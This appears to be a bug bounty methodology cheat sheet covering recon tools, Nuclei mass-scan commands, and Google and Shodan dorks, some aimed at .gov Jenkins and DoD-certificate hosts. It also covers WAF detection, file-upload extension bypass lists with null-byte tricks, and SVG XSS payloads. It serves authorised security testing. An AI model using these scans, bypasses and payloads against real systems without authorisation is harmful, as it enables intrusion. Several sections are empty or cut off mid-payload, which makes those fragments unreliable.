Bug Bounty

Custom Header Setup

Steps to Add Custom Header in Burp Requests

  • Select Proxy -> Options

  • Go to Match and Replace and select add

  • Specify the details of the match and replace as shown below

    1. Type: Request Header

    2. Match: Leave blank to add a new header

    3. Replace: hacker@bugbounty.site

    4. Comment: Manually BBP header

Information Gathering

LeakIX - often blocked by organizations for gray hat searches Shodan - scans less frequently than LeakIX but whitelisted Censys - best overall scanner but without vulnerability discovery Chaos.ProjectDiscovery - Real-time Recon/DNS data for Public Bug Bounty Programs Search Engine Dorking ReconFTW - automated recon and vulnerability scanner Uncover - tool used to discover exposed hosts on the internet using multiple search engines PrettyRecon - Active Reconnaissance Tool BountyStrike - collection of bash and python scripts that installs common tools for recon scans and asset discovery

Nuclei - Security check scanner that is based on templates; Get started with Nuclei here Nuclei Templates Directory - Visually navigate available nuclei templates Community edition nuclei templates (CENT) - collect and organize other custom templates

Getting started with some CVE scanning using Nuclei templates:

nuclei -target "https://site.com" -t cves
nuclei -target "https://site.com" -t /path/to/nuclei-templates/cves
nuclei -target "https://site.com" -t cves -rl

Mass security testing on subdomains:

cat site subdomains.txt | nuclei -t /path/to/nuclei-templates/
nuclei -t /path/to/nuclei-templates/ -l urls.txt

-rl, -rate-limit int maximum number of requests to send per second (default 150)

-rlm, -rate-limit-minute int maximum number of requests to send per minute

Combining nuclei scanner with CENT custom templates

nuclei -u https://example.com -t ./cent-nuclei-templates -tags cve
nuclei -l urls.txt -t ./cent-nuclei-templates -tags cve

Daily updated Text file of all domains within scope on active Bug Bounty Programs https://github.com/arkadiyt/bounty-targets-data/blob/main/data/domains.txt

Google DorkPurpose

intitle:"index of /.git/"

Searching for Directories

allintext:index filetype:git

Search for extensions


Searching for PHP pages

inurl:"admin/dashboard.php" site:.com

Searching for PHP admin dashboards

Intitle: "login" "admin" site:http://site.com

Searching for admin login pages

intitle:"Index of /" .htaccess site:http://site.com

Searching for exposed Apache configuration file

site:website.com inurl:"contact" | inurl:"contact-us" | inurl:"contactus" | inurl:"contcat_us" | inurl:"contact_form" | inurl:"contact-form"

Searching for possible contact form

inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example[.]com

SSRF Prone Parameters

Shodan DorkPurpose

hostname:".gov" product:"Jenkins" 200

Searching Jenkins instances in .gov


Returns all SSL services that has issued a certificate for *.google.com with an HTTP response code of 200.

ssl.cert.issuer.cn:"DOD SW CA-60" 200

Returns all SSL certificates that have been issued by the DoD with response code of 200

Sensitive Information Exposure methods Use GitTools gitdumper.sh

Defense Evasion

Attempt to bypass application protections such as Cloudflare, Akamai, etc.

Worth a shot to use the tool by Cloudflare Origin IP by @gwen001

Check to see if application is behind a WAF

wafw00f $URL
whatwaf -u $URL
nmap -p $PORT --script=http-waf-fingerprint,http-waf-detect $URL



  • Input validation

  • Analysis

  • Misc

  • Password reset process

    • Password reset tokens (expiration/reuse)

  • Failed retry lockout (DoS)

  • Password policies

  • Update profile information without asking password

  • Default or easy to guess keys

  • User enumeration

  • HTTP Authentication

  • Authentication Bypass

  • Identify weak authentication channels (Find primary mechanism and identify secondary mechanicsm / methods [Mobile App, Call Center, SSO])




File Upload:

  • Extensions Impact

    • ASP, ASPX, PHP5, PHP, PHP3: Webshell, RCE

    • SVG: Stored XSS, SSRF, XXE

    • GIF: Stored XSS, SSRF

    • CSV: CSV injection

    • XML: XXE

    • AVI: LFI, SSRF

    • HTML, JS : HTML injection, XSS, Open redirect

    • PNG, JPEG: Pixel flood attack (DoS)

    • ZIP: RCE via LFI, DoS


  • Blacklisting Bypass

    • PHP → .phtm, phtml, .phps, .pht, .php2, .php3, .php4, .php5, .shtml, .phar, .pgif, .inc

    • ASP → asp, .aspx, .cer, .asa

    • Jsp → .jsp, .jspx, .jsw, .jsv, .jspf

    • Coldfusion → .cfm, .cfml, .cfc, .dbm

    • Using random capitalization → .pHp, .pHP5, .PhAr

  • Whitelisting Bypass

    • file.jpg.php

    • file.php.jpg

    • file.php.blah123jpg

    • file.php%00.jpg

    • file.php\x00.jpg this can be done while uploading the file too, name it file.phpD.jpg and change the D (44) in hex to 00.

    • file.php%00

    • file.php%20

    • file.php%0d%0a.jpg

    • file.php.....

    • file.php/

    • file.php.\

    • file.php#.png

    • file.

    • .html



<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("HolyBugx XSS");

Open Redirect

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />

Adobe Experience Manager (AEM) Configuration Testing

Shodan Dork:

http.component:"Adobe Experience Manager"

Resources AEM Hacker Tool SlideShare presentation on AEM by 0ang3el


CVSS 3.1 Calculator

Last updated